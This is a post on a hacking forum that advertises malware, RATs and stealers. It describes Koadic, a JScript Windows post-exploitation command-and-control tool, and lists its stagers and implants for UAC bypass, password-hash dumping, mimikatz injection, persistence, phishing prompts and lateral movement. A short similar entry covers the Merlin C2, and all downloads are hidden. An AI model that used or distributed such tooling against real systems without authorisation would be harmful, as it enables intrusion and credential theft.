Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

 

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware,, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      Sign in to follow this  
      0x1

      Koadic

      1 post in this topic

      Koadic C3 COM Command & Control - JScript RAT

      Hidden Content

        Give reaction to this post to see the hidden content.

      Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.

      It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).

      Koadic also attempts to be compatible with both Python 2 and Python 3. However, as Python 2 will be going out the door in the not-too-distant future, we recommend using Python 3 for the best experience.

      Spoiler

      Hidden Content

        Give reaction to this post to see the hidden content.

      1. Hooks a zombie
      2. Elevates integrity (UAC Bypass)
      3. Dumps SAM/SECURITY hive for passwords
      4. Scans local network for open SMB
      5. Pivots to another machine

      Stagers

      Stagers hook target zombies and allow you to use implants.

                                   Module                                                                  Description

      • stager/js/mshta                                    serves payloads using MSHTA.exe HTML Applications
      • stager/js/regsvr                                    serves payloads using regsvr32.exe COM+ scriptlets
      • stager/js/wmic                                     serves payloads using WMIC XSL
      • stager/js/rundll32_js                           serves payloads using rundll32.exe
      • stager/js/disk                                      serves payloads using files on disk

      Implants

      Implants start jobs on zombies.

                                 Module                                                                    Description

      • implant/elevate/bypassuac_eventvwr                       Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
      • implant/elevate/bypassuac_sdclt                              Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10.
      • implant/fun/zombie                                                   Maxes volume and opens The Cranberries YouTube in a hidden window.
      • implant/fun/voice                                                       Plays a message over text-to-speech.
      • implant/gather/clipboard                                          Retrieves the current content of the user clipboard.
      • implant/gather/enum_domain_info                          Retrieve information about the Windows domain.
      • implant/gather/hashdump_sam                               Retrieves hashed passwords from the SAM hive.
      • implant/gather/hashdump_dc                                  Domain controller hashes from the NTDS.dit file.
      • implant/gather/user_hunter                                      Locate users logged on to domain computers (using Dynamic Wrapper X).
      • implant/inject/mimikatz_dynwrapx                           Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
      • implant/inject/mimikatz_dotnet2js                           Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
      • implant/inject/shellcode_excel                                 Runs arbitrary shellcode payload (if Excel is installed).
      • implant/manage/enable_rdesktop                           Enables remote desktop on the target.
      • implant/manage/exec_cmd                                       Run an arbitrary command on the target, and optionally receive the output.
      • implant/persist/add_user                                          Create a local/domain user.
      • implant/persist/registry                                             Add a Koadic payload to the registry.
      • implant/persist/schtasks                                            Add a Koadic payload as a Scheduled Task.
      • implant/persist/wmi                                                   Add a Koadic payload as a WMI subscription.
      • implant/phishing/password_box                               Prompt a user to enter their password.
      • implant/pivot/stage_wmi                                           Hook a zombie on another machine using WMI.
      • implant/pivot/exec_psexec                                        Run a command on another machine using psexec from sysinternals.
      • implant/scan/tcp                                                        Uses HTTP to scan open TCP ports on the target zombie LAN.
      • implant/utils/download_file                                       Downloads a file from the target zombie.
      • implant/utils/multi_module                                        Run a number of implants in succession.
      • implant/utils/upload_file                                             Uploads a file from the listening server to the target zombies.

      Disclaimer

      Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.

      Source & Dowload:

      Hidden Content

        Give reaction to this post to see the hidden content.

       

      • Like 3

      Share this post


      Link to post
      Share on other sites

      Create an account or sign in to comment

      You need to be a member in order to leave a comment

      Create an account

      Sign up for a new account in our community. It's easy!

      Register a new account

      Sign in

      Already have an account? Sign in here.

      Sign In Now
      Sign in to follow this  

      • Similar Content

        • By 0x1
          Merlin is a cross-platform post-exploitation HTTP/2 Command & Control  server and agent written in golang.

          Hidden Content
          Give reaction to this post to see the hidden content. HTTP/2 is a newly ratified protocol documented under RFC 7540 that aims to solve some of the problems with HTTP/1.x and provide functionality to support current web application operations. HTTP/2 communications are multiplexed, bi-direction connections that do not end after one request and response. Additionally, HTTP/2 is a binary protocol that makes it more compact, easy to parse, and not human readable without the use of an interpreting tool.
          An HTTP/2 connection can be setup by upgrading a HTTP/1.x connection using the `Upgrade` header or during the negotiation of a TLS encrypted channel. Application-Layer Protocol Negotiation (ALPN) is a TLS 1.2 extension that is required to setup a HTTP/2 connection identified with the `h2` protocol string. TLS versions less than 1.2 are not equipped to negotiate a HTTP/2 connection. Oddly enough, the client will perform one final check to ensure that the server can speak HTTP/2 by sending the string PRISM. This reminds me of the NSA PRISM program.
          An introductory blog post can be found : Hidden Content
          Give reaction to this post to see the hidden content.
          demo : Hidden Content
          Give reaction to this post to see the hidden content.
          Source & Download : Hidden Content
          Give reaction to this post to see the hidden content.